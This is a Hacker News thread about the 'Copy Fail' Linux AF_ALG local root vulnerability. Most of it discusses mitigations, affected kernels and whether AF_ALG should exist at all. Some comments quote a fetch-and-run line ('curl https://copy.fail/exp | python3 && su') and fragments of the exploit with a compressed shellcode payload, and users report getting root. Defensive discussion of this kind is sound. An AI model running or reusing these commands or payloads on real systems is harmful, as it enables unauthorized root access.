Copy Fail

17 hours ago (copy.fail)

As someone who works on the Linux kernel's cryptography code, the regularly occurring AF_ALG exploits are really frustrating. AF_ALG, which was added to the kernel many years ago without sufficient review, should not exist. It's very complex, and it exposes a massive attack surface to unprivileged userspace programs. And it's almost completely unnecessary, as userspace already has its own cryptography code to use. The kernel's cryptography code is just for in-kernel users (for example, dm-crypt).

The algorithm being used in this exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API.

If you're in charge of the configuration for a Linux kernel, I strongly recommend disabling all CONFIG_CRYPTO_USER_API_* kconfig options. This would have made this bug, and also every past and future AF_ALG bug, unexploitable. In the unlikely event that you find that it breaks any userspace programs on your system, please help migrate them to userspace crypto code! For some it's already been done. But in general, AF_ALG has actually never been used much in the first place, other than in exploits.

I don't think there's much other option. This sort of userspace API might have been sort of okay many years ago. But it just doesn't stand up in a world with syzbot, LLM-assisted bug discovery, etc.

  • As I did not know what AF_ALG was in the first place, I searched for it and found this:

    https://www.chronox.de/libkcapi/html/ch01s02.html

    It states the following:

    > There are several reasons for AF_ALG:

    > * The first and most important item is the access to hardware accelerators and hardware devices whose technical interface can only be accessed from the kernel mode / supervisor state of the processor. Such support cannot be used from user space except through AF_ALG.

    > * When using user space libraries, all key material and other cryptographic sensitive parameters remains in the calling application's memory even when the application supplied the information to the library. When using AF_ALG, the key material and other sensitive parameters are handed to the kernel. The calling application now can reliably erase that information from its memory and just use the cipher handle to perform the cryptographic operations. If the application is cracked an attacker cannot obtain the key material.

    > * On memory constrained systems like embedded systems, the additional memory footprint of a user space cryptographic library may be too much. As the kernel requires the kernel crypto API to be present, reusing existing code should reduce the memory footprint.

    I can't judge whether this is a good justification, but there is one.
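    For illustration, Python's standard library can drive AF_ALG directly, which makes the second quoted point concrete: after the key is handed to the kernel with ALG_SET_KEY, the application can zero its own copy and keep working through the socket handle. A minimal, hedged sketch (it assumes a Linux kernel with algif_skcipher available, and simply returns None elsewhere):

```python
import os
import socket


def kernel_aes_cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes):
    """Encrypt via the kernel's crypto API (algif_skcipher).

    Returns the ciphertext, or None if AF_ALG is unavailable
    (non-Linux, module blacklisted, or socket creation denied).
    """
    try:
        with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as alg:
            alg.bind(("skcipher", "cbc(aes)"))
            alg.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            # From this point on the caller could erase its copy of `key`;
            # the kernel holds the key, and operations go through the handle.
            op, _ = alg.accept()
            with op:
                op.sendmsg_afalg([plaintext], op=socket.ALG_OP_ENCRYPT, iv=iv)
                return op.recv(len(plaintext))
    except (AttributeError, OSError):
        return None


ct = kernel_aes_cbc_encrypt(os.urandom(16), os.urandom(16), b"sixteen byte msg")
```

    (The AF_ALG constants and `sendmsg_afalg` are Linux-only parts of Python's socket module; this is a sketch of the mechanism, not a recommendation to use it.)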

    • AF_ALG, if I remember correctly, predates userspace-accessible crypto acceleration and was way more important back when you had an actual need for "SSL accelerator" cards in servers, among other things

    • Hi, embedded firmware engineer here. I give it a B-

      There's a weird area between the workloads that fit on a microcontroller, and the stuff that demands a full-blown CPU. Think softcore processors on FPGAs, super tiny MIPS and RISC-V cores on an ASIC, etc. Typically you run something like Yocto on a core like that. Maybe MontaVista or QNX if you've got the right nerd running the show.

      So you have serious compute needs, and security concerns that justify virtual memory. But you don't have infinite space to work with, so hardware acceleration is important. Having a standard API built into the kernel seems like a decent idea I guess.

      And yet, I've never heard of AF_ALG. I've never seen it used. The thing is, if you have some bizarro softcore, there's a good chance you also have a bizarro crypto engine with no upstream kernel driver. If you're going to the trouble of rolling your own kernel with drivers for special crypto engines, why would you bother hooking it into this thing? Roll your own API that fits your needs and doesn't have a gigantic attack surface.

  • Please don't rely on my judgement for this being safe for production, but after blacklisting the modules, the provided python exploit failed.

    Check if the following are built as modules:

      grep CONFIG_CRYPTO_USER_API /boot/config-$(uname -r)
    

    If they are, you can try blacklisting them:

      /etc/modprobe.d/blacklist-crypto-user-api.conf
      
      """
      blacklist af_alg
      blacklist algif_hash
      blacklist algif_skcipher
      blacklist algif_rng
      blacklist algif_aead
    
      install af_alg /bin/false
      install algif_hash /bin/false
      install algif_skcipher /bin/false
      install algif_rng /bin/false
      install algif_aead /bin/false
      """
    
      update-initramfs -u
    

    Can anyone comment on the ramifications of this?

    • If iwd, or cryptsetup with certain non-default algorithms, isn't being used on the system, you should be fine. Not many programs use AF_ALG. It's possible there are others I'm not aware of, but it's quite rare.

      To be clear, general-purpose Linux distros generally can't disable these kconfig options yet, due to these cases. But there are many Linux systems that simply don't need this functionality.

      A good project for someone to work on would be to fix iwd and cryptsetup to always use userspace crypto, as they should.

      2 replies →

    • I can’t comment on the ramifications, except to note that elsewhere in the thread this appears not to break anything (whether it makes userspace crypto a little less safe is academic, and doesn’t matter much next to an easy local root shell). I can verify that the above fix does protect Ubuntu 24.04 from the exploit.

      Just reboot after applying this change.

  • For anyone wondering: AF_ALG is a Linux socket interface that exposes the kernel’s crypto API via file descriptors, using normal read(2)/write(2) calls for hashing and encryption.
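    The same interface can be poked at from Python's socket module. A hedged sketch of kernel-side SHA-256 (it returns None where AF_ALG is unavailable, e.g. on non-Linux systems or after the module blacklisting discussed elsewhere in the thread):

```python
import hashlib
import socket


def kernel_sha256(data: bytes):
    """Hash via the kernel's crypto API (algif_hash); None if unavailable."""
    try:
        with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as alg:
            alg.bind(("hash", "sha256"))  # (algorithm type, algorithm name)
            op, _ = alg.accept()          # per-operation handle
            with op:
                op.sendall(data)          # write(2) the data to be hashed
                return op.recv(32)        # read(2) back the 32-byte digest
    except (AttributeError, OSError):
        return None


digest = kernel_sha256(b"hello")
if digest is not None:
    assert digest == hashlib.sha256(b"hello").digest()
```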

  • I was completely unaware of https://syzbot.org, thanks for sharing!

    > syzbot system continuously fuzzes main Linux kernel branches and automatically reports found bugs to kernel mailing lists. syzbot dashboard shows current statuses of bugs. All syzbot-reported bugs are also CCed to syzkaller-bugs mailing list. Direct all questions to syzkaller@googlegroups.com.

  • The primary benefit of AF_ALG is IMHO when it's combined with kernel keyrings, i.e. ALG_SET_KEY_BY_KEY_SERIAL.

    To steal from the sibling post:

    > * When using user space libraries, all key material and other cryptographic sensitive parameters remains in the calling application's memory even when the application supplied the information to the library. When using AF_ALG, the key material and other sensitive parameters are handed to the kernel. The calling application now can reliably erase that information [...]

    It's even more than this: you can do crypto ops in user space without ever even having the key to begin with.

    [Ed.: that said, maybe AF_ALG should be locked behind some CAP_*]

    [Ed.#2: that said^2, I'm putting this one on authencesn, not AF_ALG. It's the extended sequence number juggling that went poorly, not AF_ALG at large. I bet this might even blow up in some strange hardware scenarios, "network packet on PCIe memory" or something like that - I'm speculating, though.]

    • It doesn't seem to actually get used that way in practice. ALG_SET_KEY_BY_KEY_SERIAL didn't even appear until just a few years ago. And either way, if the interface allows you to overwrite the su binary, whether it theoretically could provide some other security benefit becomes kind of irrelevant.

      1 reply →

  • It does enable address space separation of secret keys from user space, which some people love:

    https://blog.cloudflare.com/the-linux-kernel-key-retention-s...

    https://www.youtube.com/watch?v=7djRRjxaCKk

    https://www.youtube.com/watch?v=lvZaDE578yc

    So it's not as simple as "should not exist". I agree though that there doesn't seem to be a valid need to expose authencesn to user space.

    Disclosure: I'm co-maintaining crypto/asymmetric_keys/ in the kernel and the author/presenter in the first two links is another co-maintainer.

    • That can be done in userspace too -- different userspace processes have different address spaces too.

      The fact that the first link recommends using keyctl() for RSA private keys is also "interesting", given that the kernel's implementation of RSA isn't hardened against timing attacks (but userspace implementations of RSA typically are).

      2 replies →

    • Can you please give me a real-life example of a userspace application, on a typical Linux laptop or typical Linux server, that would use this CRYPTO_USER_API? None that I looked at seem to use it: openssl, pgp, sha256sum

      2 replies →

  • Why is this available in the kernel on a box that does not use IPsec? Shouldn't this be a compile-time-enabled module rather than a generic always-on feature?

    • The design philosophy of mainstream Linux distros is not like OpenBSD.

      Linux distros go to market as maximally capable, maximally interoperable, and maximally available for whatever the users want to do. So there is a lot of "shovelware" that is unnecessarily installed with your base system. A lot of services are enabled that you don't need. A lot of kernel modules are loaded or ready to spring into action as soon as you connect hardware that the kernel recognizes.

      All this maximizing also increases the system's attack surface, whether local or over the network. Your resources, time and effort increase, to update the system and maintain all those packages. The TCO is high.

      With OpenBSD, the base system is hardened and the code is audited with security in mind. They only install or enable essential functions. So it's up to the user to dig in, customize it, and add in features that are needed.

      The good news is that you can do some after-market hardening. Uninstall software that you're not using, and disable non-essential services. Tune your kernel for special-purpose, or general-purpose, but not every-purpose.

      There are now special distros for containers and VMs with minimal system builds. They are designed to be as small and lightweight as possible. That is a good start in the right direction.

  • I think it would be reasonable to deprecate af_alg in favor of a character device. It's more accessible that way. The downside is that the maintainers hate adding new ioctls. I think that's fair. But I don't think a "regular" device node would cover the functionality userland expects.

    That said, elsewhere ITT it's pointed out there are only a few use cases so far.

  • Many things, such as ksmbd, seem ill-advised when looked at from a security perspective. The new era of AI-driven exploit discovery will likely make projects more wary of adding features.

  • How did it get in? Isn’t Linus known for being rightfully fussy about what makes it into the kernel?

    Would be an interesting story.

    • Linus has been fussy about maybe 5% of things, because even then he couldn't keep up with the sheer volume. Nowadays it's more like 1‰.

  • any idea what software this will break once I turn this kernel configuration off?

    • iwd is the main culprit (for systems that use it instead of wpa_supplicant).

      I think cryptsetup / LUKS also requires it with some non-default options. With the default options, it works fine with the kconfigs disabled.

      There's not much else, as far as I know. Normally programs just use a userspace library instead, such as OpenSSL.

It seems there was some kind of confusion during the disclosure process, because the vendors aren't treating this vulnerability as serious and it remains unpatched in many distros.

https://access.redhat.com/security/cve/cve-2026-31431 "Moderate severity", "Fix deferred"

https://security-tracker.debian.org/tracker/CVE-2026-31431

https://ubuntu.com/security/CVE-2026-31431

https://www.suse.com/security/cve/CVE-2026-31431.html

  • Seems like distros consider it a medium risk because it doesn't involve remote code execution and requires local access. Though it allows local root privilege escalation which is considered high priority.

    https://ubuntu.com/security/cves/about#priority

    > Medium: A significant problem, typically exploitable for many users. Includes network daemon denial of service, cross-site scripting, and gaining user privileges.

    • Strange that it's not classified as "high", which specifically includes "local root privilege escalations".

      > High: A significant problem, typically exploitable for nearly all users in a default installation of Ubuntu. Includes serious remote denial of service, local root privilege escalations, local data theft, and data loss.

      1 reply →

    • if your model is that linux is just about single-user desktops, this local exploit isn't too bad. or if your model is nothing but DB servers or the like.

      mystifying to me that shared, multi-user machines are not thought of. for instance, I administer a system with 27k users - people who can login. even if only 1/10,000 of them are curious/malicious/compromised, we (Canadian national research HPC systems) are at risk. yes, this is somewhat uncommon these days, when shell access is not the norm.

      but consider the very common sort of shared hosting environment: they typically provide something like plesk to interface to shared machines with no particular isolation. can you (as a website owner or 0wner) convince wordpress/etc to drop and execute a script? yep.

      5 replies →

    • Local access is a bit of a misnomer though, a vulnerable website can be tricked into running a script

    • it's not like this couldn't be chained with another exploit that provides remote access, turning it into remote root, which seems like a bit of an issue

  • It was already known to attackers (or basically anyone watching) weeks ago when the patch hit the kernel but it wasn't communicated by upstream as a vuln (because Linus and Greg do not believe that vulnerabilities are conceptually relevant to the kernel).

  • I thought that too. Surely people are going crazy right now owning anything with an out-of-date WordPress exposed.

It's unfortunate that this does not include which versions of the kernel are vulnerable/patched, especially since this is a builtin module which cannot be easily removed with rmmod...

I was wondering if I was vulnerable running Fedora 44, kernel 6.19.14, and after a few minutes of digging I was able to find the linux-cve-announce mailing list post: https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20... which says:

  ...fixed in 6.18.22 with commit fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8

  ...fixed in 6.19.12 with commit ce42ee423e58dffa5ec03524054c9d8bfd4f6237

  ...fixed in 7.0 with commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5

Hope that helps.

  • most distros backport fixes, which does not increment the version number; i.e., they patch it rather than shipping a completely new kernel release.
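    Given that caveat, checking the version string is only a rough signal. A sketch comparing a `uname -r`-style string against the fixed upstream releases quoted above (6.18.22, 6.19.12, 7.0); it cannot detect distro backports, and older stable branches may have their own fix releases not quoted here:

```python
import re

# Fixed upstream stable releases quoted from the linux-cve-announce post.
FIXES = [(6, 18, 22), (6, 19, 12), (7, 0, 0)]


def upstream_fixed(release: str):
    """True/False if `release` is at or before a listed fixed version.

    Returns False for stable series not listed above (which may still have
    their own fix releases), and None for unparseable strings. Distro
    backports, which do not bump the version, are invisible to this check.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        return None
    v = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    for fix in FIXES:
        if v[:2] == fix[:2]:
            return v >= fix
    return v >= (7, 0, 0)  # any series newer than 7.0 includes the fix


assert upstream_fixed("6.19.14-200.fc44.x86_64") is True  # the Fedora case above
assert upstream_fixed("6.18.21") is False
```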

If you want to use the suggested mitigation (disabling kernel module `algif_aead` with a modprobe config), and you do not want to run that whole obfuscated shell code to get an actual root shell, but only check if the module can be loaded, here is a readable version of its first few lines:

    python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind(("aead","authencesn(hmac(sha256),cbc(aes))")); print("algif_aead probably successfully loaded, mitigation not effective; remove again with: rmmod algif_aead")'

Similarly, when the mitigation is in place,

    modprobe algif_aead

should fail with an error.

  •     modprobe algif_aead
        modprobe: FATAL: Module algif_aead not found in directory /lib/modules/6.14.3-x86_64-linode168
    

    Yet this kernel is vulnerable.

    • That would suggest that CRYPTO_USER_API_AEAD=y in your kernel config. You can disable it in that case by setting that to "n", recompiling your kernel, and putting the new kernel in place.

This submission is currently the main HN submission.

As of now the submission title is simply “Copy Fail”.

Given the severity of the exploit, can we edit the title to add some context that it’s a major Linux vulnerability?

E.g. the other submissions say: “Copy Fail: 732 Bytes to Root on Every Major Linux Distribution.”

  • I don't really get why you'd

    - buy a domain

    - vibe code a page/artifact/whatever (which, given the quality of LLM wordings, only makes an argument less strong)

    - post it on HN with no further explanation in the title

    Why not write a detailed report? Even a tweet makes much more sense in my head than this. Even a logo??

    Sorry if this comes across as salty; I guess I'm just not getting the thought process.

    • I think they’re using it to promote their product, Xint Code, which was used to discover it. That’s the way I read it anyway.

    • Definitely comes across as salty. Naming major flaws has been a tradition for decades. Remember Heartbleed? It had a site and a logo :) Shellshock, Meltdown, Spectre as well. A few more: https://github.com/hannob/vulns

      This site though is pretty useful; first it serves as a central location to point people to with short links in chats/emails/whatever, then it has a quick visual explainer and a link to the detailed technical report for those who want more info. Pretty neat.

      Last but not least, buying the domain must have taken 5 minutes, prompting the page must have taken 30 minutes and posting it on HN must have taken 1 minute. So it certainly wasn't a lot of work in the grand scheme of things and probably did not deter the team from doing other important things.

LPE = local privilege escalation

Too many darn acronyms. This one wasn't too hard to figure out from context but I wish people would define acronyms before using them!

  • LPE is a very well-known acronym within the security community, it's not purely academic or obscure or anything.

    I agree that it would be a good idea to define it explicitly when writing for a broader audience, but I don't think it's particularly egregious that they didn't. It's certainly something I could see myself forgetting.

    Then again, the whole writeup appears to be AI-generated, so...

    • Sure, but the target audience of copy.fail is surely not the security community but regular sysadmins who probably don't otherwise follow as closely.

  • To be fair, I just consulted 3 cybersecurity glossaries (SANS.org, NIST CSRC, Huntress), and none of them list "LPE" nor "Local Privilege Escalation".

    If you type "LPE" into English Wikipedia's search bar, and press "Enter", you'll be sent to a disambiguation page which contains a link to the relevant article.

    https://en.wikipedia.org/wiki/LPE

  • I don't know why, but newer writers have never been taught to expand their acronyms on first use. I blame the US education system.

Good thing nobody is silly enough to let fully autonomous AI agents run as regular users on these affected operating systems. That could be disastrous given a zero day prompt injection technique.

That is why we should get rid of setuid binaries. GrapheneOS does not use them and was therefore not affected. On the desktop there is also a project called Secureblue, based on Fedora Atomic, that is moving in a similar direction and has already eliminated a large number (though not all) of its setuid binaries. As an alternative to sudo, su, and pkexec there is, for example, run0, which is available in distributions using systemd. Since systemd 259 there is also the --empower parameter, which, like sudo, elevates the privileges of a regular user. Essentially, any distribution could start removing sudo and create an alias so that users don’t have to adjust immediately.

I wasn't able to unload algif_aead on RHEL 9/10 because it's built in, rather than a module.

So here's the next-best thing I found: disable AF_ALG via systemd. This needs drop-ins for all exposed services. Here's an Ansible playbook that covers sshd and user@, which are usually the main ones.

https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464d...

  • How about blacklisting algif_aead initialization function on RHEL 9/10? I added "initcall_blacklist=algif_aead_init" to the kernel boot options and rebooted. The exploit is not working anymore.

    • Good idea. Added to the playbook for RHEL only.

      On Debian normal unloading of the module works.

  • FYI RHEL's SELinux policy blocks AF_ALG socket creation for confined services out of the box. But disabling via RestrictAddressFamilies= unit option, or initcall_blacklist= kernel parameter, seems to be a good mitigation for unconfined services, users and containers.

The page itself seems vibecoded and a bit of an advertisement, but it does look like the vulnerability is real and high risk. It also explains the big security update I just got; guess I'll prioritize updating today.

  • This is pretty obviously an advertisement, but it's a pretty good one imo: it pairs a meaningful contribution to the OSS ecosystem (discovering and patching a real bug) with selling their cybersecurity tool at the same time.

  • These guys don't need to advertise, they are already 100% busy with work. But who wastes their time manually creating web pages? Especially kernel devs.

    • Side comment: I have recently used Claude Code to make a few sites for testing purposes. In the prompt I added "don't make it look vibe coded," and it worked pretty well: No purple gradients, bento box layouts, etc. Nothing spectacularly original, either, but probably enough to avoid accusations of vibe coding.

For mitigation, the page currently basically just says:

> Update your distribution's kernel package to one that includes mainline commit a664bf3d603d

But it isn't very clear to me what kernel version you can expect that to be in. For Arch/CachyOS, the patch seems to be included in 6.18.22+, 6.19.12+ and 7.0+. If you're on a lower version in the same upstream stable series, you're likely vulnerable right now. Some distro kernels may include the fix in other versions, so check for your distribution.

So this replaces a SUID binary in order to run as UID 0. The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms", but I don't see anything supporting the claim that it can escape a container (or, specifically, a user namespace).

I ran the exploit in rootless Podman, and predictably it doesn't escape the container.

They also claim their script "roots every Linux distribution shipped since 2017", but they only tested four, and it doesn't work on Alpine.

  • >The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container

    they state that the write-up is forthcoming. presumably there is some additional steps or modifications that will be detailed in the 'part 2'.

    "Next: "From Pod to Host," how Copy Fail escapes every major cloud Kubernetes platform."

  • It overwrites bytes in the page cache of any file you can read. It's not hard to imagine how that could escape a lot of things.

  • > They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine

    They've done themselves no favours at all with their write up.

    It does seem legitimate (I was able to use the PoC on a 24.04 instance), and it seems like it should be a big deal, but the actual number of affected distributions seems way lower, and not remotely every distribution since 2017 as they claim.

    For example with Ubuntu, if I'm reading it right there's some impact in 16.04 (EOL), but then, at least per their analysis, it's only the vendor-specific 6.17 kernels they ship that have it (e.g. linux-gcp, linux-oracle-6.7 etc.). That's a relatively new kernel version they started shipping recently, after it was released upstream last September.

  • If you can get to real UID 0 from a rootless container, you can escape it, but you do need to take extra steps. Same with it working on Alpine: the underlying vulnerability probably still exists, but the script might need some adjusting. It's a PoC, not a full exploit for every situation.

    • It's worth pointing out that you cannot, definitionally, get "real UID 0" in a "rootless" container, because then it wouldn't be a rootless container. This is relevant because this exploit doesn't claim to be able to bypass user namespaces, and that getting "real UID 0" would be a different exploit.

  • Kubernetes 1.33 switches to user namespaces enabled by default, which I imagine is the same underlying mechanism that rootless Podman uses. `hostUsers: false` is the way to ensure that root in the pod is not root on the host. It's trivial for a real (unmapped) root to escape a Kubernetes pod.

  • Their PoC does as you say, but it is built on arbitrary modification of the page cache, which could be abused for other things.

  • It also doesn't work on Raspberry Pi, though presumably it could easily be made to; it does replace the su binary, but the replacement is not executable.

    • It's patching the binary in memory, so the binary patch would be architecture dependent. The existing one is only x86_64, but with an updated payload, it would work on arm.

    • This is because the `su` binary is replaced with x86 shellcode; replace it with aarch64 shellcode and it will work just the same.

  • Did you try it on systems that don't have the patch already? Seems many distributions already shipped kernels with the patch ~a month ago.

    • Yes. Alpine in rootless Podman doesn't work (after replacing "/usr/bin/su" with "/bin/su" in the .py, running it just doesn't do anything), while it does work in Debian in rootless Podman on the same host.

As soon as I read this

>Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. any user becomes root

jumped out of bed and went straight into webminal.org servers as a local user and ran the Python code. It says permission denied on the socket() call.

Then I tested on my local laptop:

    $ uname -a
    Linux debian 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64 GNU/Linux
    $ python3 copy_fail_exp.py
    # cd /root && ls
    bluetooth_fix_log.txt  dead.letter  overcommit_memorx~  overcommit_memory~  overcommit_memorz~  resize.txt  snap

It does provide root access!

  • I also tested this on an Ubuntu 24.04 (x86_64) host w/ GA kernel ("6.8.0-103-generic #103-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 10 13:34:59 UTC 2026 x86_64 GNU/Linux") and wasn't able to reproduce the "problem", although `canonical-livepatch` tells me that there are currently "no livepatches available".

Is there a readable version of the exploit readily available by any chance? Gotta admit that I failed binary-zip-interpretation-with-naked-eye class twice

I couldn't get the POC to work with my version of Python, so I had ChatGPT convert it to C [0] and was able to verify my Slackware system does not appear to be affected; my NixOS system would be if I had any world-readable suid binaries (I had to make one to test it).

[0] https://rkeene.org/viewer/tmp/copy_fail_exp.c.htm

  • Don't you have like, a sudo in /run/wrappers/bin?

    EDIT: Sorry, I failed at reading your message. Never mind.

This looks like an extraordinary find at first glance.

Does this mean you can go from a basic web shell from a shared hosting account to root? I can see how that could wreak havoc really quickly.

Interestingly it fails for me because my `su` isn't world-readable:

  $ stat /bin/su
    File: /bin/su
    Size: 59552           Blocks: 118        IO Block: 59904  regular file
  Device: 0,52    Inode: 796854      Links: 1
  Access: (4711/-rws--x--x)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2023-09-18 13:23:03.117105665 -0500
  Modify: 2021-02-13 05:15:56.000000000 -0600
  Change: 2023-09-18 13:23:03.119105665 -0500
   Birth: 2023-09-18 13:23:03.117105665 -0500

I'm not sure I have any setuid/setgid binaries that are world-readable...

  • A workaround might be to make all setuid/setgid files non-world-readable, because then they cannot be opened for reading at all, and thus there is no setuid file whose contents can be replaced.
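    A sketch of how one might enumerate the candidate files, i.e. world-readable setuid/setgid binaries an unprivileged user could open (the directory scanned is just an example; a real audit would walk every directory on $PATH and beyond):

```python
import os
import stat


def world_readable_setids(root: str = "/usr/bin"):
    """List regular files under `root` that are setuid/setgid AND
    world-readable, i.e. exactly the kind of target this exploit needs."""
    hits = []
    for entry in os.scandir(root):
        try:
            st = entry.stat(follow_symlinks=False)
        except OSError:
            continue  # raced deletion, permission issues, etc.
        mode = st.st_mode
        is_setid = bool(mode & (stat.S_ISUID | stat.S_ISGID))
        if stat.S_ISREG(mode) and is_setid and (mode & stat.S_IROTH):
            hits.append(entry.path)
    return sorted(hits)
```

    Running `world_readable_setids()` on a stock system will typically list su, sudo, mount and friends; after the proposed chmod o-r workaround it should come back empty.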

    • Eh, if you can pollute page caches this won't save you.

      Think modifying shared libraries, ld preload, cron, I guess on some systems /etc/passwd even.

      There are a lot of files readable that should definitely not be writable.

      1 reply →

  • It being readable is the default configuration in most places; after all, the purpose is to call it from a non-privileged user. But I could see it being made non-readable, since its use is discouraged nowadays... though then I'd expect sudo to be readable as an alternative.

    • My `sudo` is also not readable. Files/directories don't need to be readable to be executed. I can still use `su` and `sudo`.
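      To make the execute-without-read point concrete, here's a small demonstration (nothing to do with the exploit itself): a compiled binary with mode 0111 still runs via execve(), but open() for reading fails. Note this only holds for binaries; a #! script must be re-opened by its interpreter, so scripts need the read bit too. It assumes /bin/echo exists and skips the read check when running as root:

```python
import os
import shutil
import subprocess
import tempfile

out = None
if os.path.exists("/bin/echo"):
    with tempfile.TemporaryDirectory() as d:
        prog = os.path.join(d, "echo")  # keep the name: busybox dispatches on argv[0]
        shutil.copy("/bin/echo", prog)
        os.chmod(prog, 0o111)           # ---x--x--x: execute-only
        try:
            out = subprocess.run([prog, "ok"], capture_output=True,
                                 text=True).stdout.strip()
        except PermissionError:
            out = None                  # e.g. tmpdir mounted noexec
        if os.geteuid() != 0:           # root bypasses permission checks
            try:
                open(prog, "rb").close()
                raise AssertionError("expected PermissionError on read")
            except PermissionError:
                pass
```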

This is amazing. The page says it works on RHEL 14.3, which doesn’t exist. Current RHEL is 10.x; this must’ve been done in a TARDIS.

If this is verified, this is a very big deal. Root access on any shared computer. Additionally do we know what kernel versions and stable versions have the patch?

    curl https://copy.fail/exp | python3 && su
    Traceback (most recent call last):
      File "<stdin>", line 9, in <module>
      File "<stdin>", line 5, in c
    AttributeError: module 'os' has no attribute 'splice'

Does this mean I'm not affected or it's a buggy script?

Edit: python3 is Python 3.6 on my system. Running with python3.10 instantly roots. Crazy find! (The script uses os.splice, which was only added in Python 3.10.)

Could this be used to root Android devices? Does Android ship with algif_aead?

  • I rewrote it quickly to C [1] (and changed the embedded binary to be aarch64).

    Unfortunately it fails on calling bind() on my device, so probably Android doesn't ship with that kernel module by default :(. So no freedom for my $40 phone.

    Putting it out here, maybe somebody else will have better luck.

    [1] https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...

    • Update: Checking the kernel config indeed confirms this.

         adb shell zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
         # CONFIG_CRYPTO_USER_API_HASH is not set
         # CONFIG_CRYPTO_USER_API_SKCIPHER is not set
         # CONFIG_CRYPTO_USER_API_RNG is not set
         # CONFIG_CRYPTO_USER_API_AEAD is not set

  • There’s SELinux, everything is mounted nosuid, barely anything runs as root except init. I doubt it.

    • You don't need a suid binary for this; the exploit has an arbitrary memory write. The suid binary is just a convenient and portable way to demonstrate it. Real exploits will use many different mechanisms.

  • I’ve poked around on my phone and it didn’t work:

        File "/data/data/com.termux/files/home/a.py", line 5, in c
          a=s.socket(38,5,0); # ...
        File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
          _socket.socket.__init__(self, family, type, proto, fileno)
          ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      PermissionError: [Errno 13] Permission denied

    • I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user-accessible setuid binary for it to work.

          Traceback (most recent call last):
            File "/data/data/com.termux/files/home/exploit.py", line 8, in <module>
              f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
                ^^^^^^^^^^^^^^^^^^^^^^^
          FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

      5 replies →

  • Android is smarter than setuid + system partitions aren't writable.

    • System partitions being non-writable has nothing to do with the vulnerability - it allows modifying the cache of any file that you can open for reading.

      Not using setuid anywhere means you'd have to build a slightly more clever exploit, but it's still trivial - just modify some binary you know will run as root "soon".

      But... I didn't check, but IIRC the untrusted_app secontext that apps run in is not allowed to open AF_ALG sockets - so you can't directly trigger the vulnerability as a malicious app. Although it might be possible in some roundabout way (requesting some more privileged crypto service to do so).

      2 replies →

    • It's not writing to the partition though, is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.

      1 reply →

Tried this on my Arch VPS, which has a few users and hasn't been rebooted for 122 days.

Got:

    OSError: [Errno 97] Address family not supported by protocol

I guess AF_ALG is not part of the Arch Linux LTS kernel?

Edit:

Looks like on Arch you have to go out of your way to have this enabled.

    $ zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
    CONFIG_CRYPTO_USER_API=m
    CONFIG_CRYPTO_USER_API_HASH=m
    CONFIG_CRYPTO_USER_API_SKCIPHER=m
    CONFIG_CRYPTO_USER_API_RNG=m
    # CONFIG_CRYPTO_USER_API_RNG_CAVP is not set
    CONFIG_CRYPTO_USER_API_AEAD=m
    # CONFIG_CRYPTO_USER_API_ENABLE_OBSOLETE is not set
    $ uname -r
    6.12.63-1-lts

  • On my Arch boxes the official exploit works, both with the LTS kernel (6.18.21-1-lts) and the mainline release (6.19.6-arch1-1).

    • Yeah, I think maybe it loads the module on demand. The problem is that I've upgraded my kernel many times in the last 122 days, which wipes out the modules directory for the currently running kernel. I'm guessing that if the running kernel's modules directory were still present, the module would load on demand and I'd get root.
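The on-demand loading is easy to check from Python without running the exploit. A minimal probe, as a sketch: the AF_ALG constant is hardcoded as a fallback for builds that lack `socket.AF_ALG`, and "hash"/"sha256" are chosen arbitrarily as a harmless algorithm. bind() is the call that makes the kernel try to autoload the matching algif_* module.

```python
import errno
import socket

# socket.AF_ALG exists on Linux builds of CPython 3.6+; fall back to the
# raw constant value so the probe still runs where the attribute is missing.
AF_ALG = getattr(socket, "AF_ALG", 38)


def probe_af_alg(alg_type="hash", alg_name="sha256"):
    """Return (usable, errno_name) for an unprivileged AF_ALG bind attempt."""
    try:
        s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError as e:
        # EAFNOSUPPORT: AF_ALG compiled out or module blacklisted;
        # EACCES/EPERM: blocked by LSM or seccomp policy.
        return False, errno.errorcode.get(e.errno, str(e.errno))
    try:
        s.bind((alg_type, alg_name))  # triggers request_module() on demand
    except OSError as e:
        return False, errno.errorcode.get(e.errno, str(e.errno))
    finally:
        s.close()
    return True, None


if __name__ == "__main__":
    print(probe_af_alg())
```

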